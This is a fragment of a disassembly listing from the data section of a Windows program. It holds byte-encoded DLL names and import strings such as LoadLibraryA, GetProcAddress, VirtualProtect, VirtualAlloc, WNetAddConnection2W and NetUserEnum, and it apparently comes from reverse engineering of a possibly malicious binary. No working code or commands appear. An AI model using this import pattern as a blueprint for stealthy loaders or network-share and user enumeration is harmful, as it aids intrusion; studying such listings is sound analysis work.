db 45h, 52h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 4556h
db 52h ; R
db 53h, 49h, 4Fh
db 4Eh ; N
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 4957h
db 4Eh ; N
db 49h, 4Eh, 45h
db 54h ; T
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 5357h
db 32h ; 2
db 5Fh, 33h, 32h
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
align 2
aLoadlibrarya db 'LoadLibraryA',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
aVirtualprotect db 'VirtualProtect',0
align 4
aVirtualalloc db 'VirtualAlloc',0
align 2
aVirtualfree db 'VirtualFree',0
align 10h
aFreesid_0 db 'FreeSid',0
db 0
align 2
aWnetaddconnect db 'WNetAddConnection2W',0
align 10h
aAbs db 'abs',0
db 0
align 2
aNetuserenum db 'NetUserEnum',0
align 4
aCouninitiali_0 db 'CoUninitialize',0
align 4
aNdrclientcal_0 db 'NdrClientCall2',0
align 4
aStrstria db 'StrStrIA',0
align 2
aObtainuserag_0 db 'ObtainUserAgentString',0
dd 65470000h, 676C4474h, 6D657449h, 65560000h, 65755172h
dd 61567972h, 4165756Ch, 6E490000h, 6E726574h, 704F7465h
dd 416E65h, 20000h, 0Ch, 31CDh
db 2 dup(0)
dw ?
dd 324h dup(?)
_text ends
end start